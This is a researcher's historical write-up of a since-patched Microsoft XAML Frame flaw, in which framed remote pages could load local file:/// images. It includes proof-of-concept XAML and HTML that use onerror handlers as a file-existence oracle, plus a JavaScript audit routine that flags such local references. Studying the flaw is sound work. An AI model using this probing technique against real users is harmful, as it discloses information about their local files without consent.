Continuing the investigation of what XAML Frame pages could access that standard Internet Zone pages could not, I found that <img> tags with file:/// URLs loaded successfully inside a XAML Frame. A standard Internet Zone page gets a security error trying the same thing. This meant a remote page hosted inside a XAML Frame could both display the user’s local images and — combined with an onerror handler — use image load failures as a file-existence oracle.
The XAML page hosting the Frame:
<Page xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
WindowTitle="XAML_LoadLocalImages">
<TextBlock HorizontalAlignment="Center" VerticalAlignment="Top">
<Bold>This is a XAML Frame:</Bold>
<LineBreak /><LineBreak /><LineBreak />
&lt;<Bold>Frame</Bold> Width="700" Height="600" Source="LoadLocalImages.html" /&gt;
<LineBreak /><LineBreak />
<Frame Width="700" Height="600" Source="LoadLocalImages.html" />
</TextBlock>
</Page>
LoadLocalImages.html (the HTML page loaded inside the XAML Frame):
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>XAML_LoadLocalImages</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>XAML_LoadLocalImages</h2>
</center>
If we are inside a Framed XAML, we can <b>load local IMG Files</b> and/or check if they exist.<br /><br />
<img src="file:///c:/Windows/Web/Wallpaper/img1.jpg"><br />
<img src="file:///c:/Windows/Web/Wallpaper/img1.jpg" onerror="this.style.display='none'"><br />
<img src="file:///c:/Windows/Web/Wallpaper/Autumn.jpg" onerror="this.style.display='none'"><br />
</font>
</body>
</html>
The XAML Frame host did not enforce the same-zone restriction that prevents Internet Zone HTML pages from loading file:/// resources. As a result, <img src="file:///c:/Windows/Web/Wallpaper/Autumn.jpg"> loaded and rendered the local wallpaper image directly in the page. The onerror="this.style.display='none'" handlers hide images that fail to load, which also provides a quiet file-existence check — if the image renders, the file is there. Combined with the other XAML Frame information disclosure issues (script tag src, document.URL), this illustrated a consistent pattern of the XAML hosting layer being insufficiently sandboxed.
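The cross-zone check described above can be expressed as a small audit over markup served from a remote origin. This is an added example, not code from the original post or from any Microsoft component; the function names, the example.test URL and the extra remote image are assumptions, and the drive-letter and UNC handling goes slightly beyond the file:/// case shown on the page.

```javascript
// Added example, not from the original post. Function names are hypothetical.
// Simplified model: an http(s) document must not pull subresources from the
// local file system (file: URLs, drive-letter paths, UNC paths).

function isLocalResource(src, documentUrl) {
  const raw = src.trim();
  // Drive-letter ("c:\...") and UNC ("\\host\share") paths are classified before URL parsing.
  if (/^[a-z]:[\\/]/i.test(raw) || raw.startsWith("\\\\")) return true;
  try {
    return new URL(raw, documentUrl).protocol === "file:";
  } catch {
    return false; // unparseable reference: nothing to load
  }
}

function auditMarkup(html, documentUrl) {
  const docScheme = new URL(documentUrl).protocol;
  if (docScheme !== "http:" && docScheme !== "https:") return []; // only remote documents are in scope
  const findings = [];
  // Regex tag matching is enough for an audit pass; it is not a full HTML parser.
  for (const [tag] of html.matchAll(/<img\b[^>]*>/gi)) {
    const attrs = {};
    for (const m of tag.matchAll(/([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g)) {
      attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
    }
    if (attrs.src !== undefined && isLocalResource(attrs.src, documentUrl)) {
      // An error handler on a local reference turns load failure into a signal.
      findings.push({ src: attrs.src, hasErrorHandler: "onerror" in attrs });
    }
  }
  return findings;
}

// Constructed input: the <img> lines from LoadLocalImages.html plus one ordinary remote image.
const SAMPLE = `
<img src="file:///c:/Windows/Web/Wallpaper/img1.jpg"><br />
<img src="file:///c:/Windows/Web/Wallpaper/img1.jpg" onerror="this.style.display='none'"><br />
<img src="file:///c:/Windows/Web/Wallpaper/Autumn.jpg" onerror="this.style.display='none'"><br />
<img src="/images/logo.png" alt="logo">
`;

for (const f of auditMarkup(SAMPLE, "http://example.test/LoadLocalImages.html")) {
  console.log(`${f.hasErrorHandler ? "local ref + onerror" : "local ref"}: ${f.src}`);
}
```

The same markup audited against a file: document URL yields no findings, since only remote documents crossing into the local file system are in scope.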
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.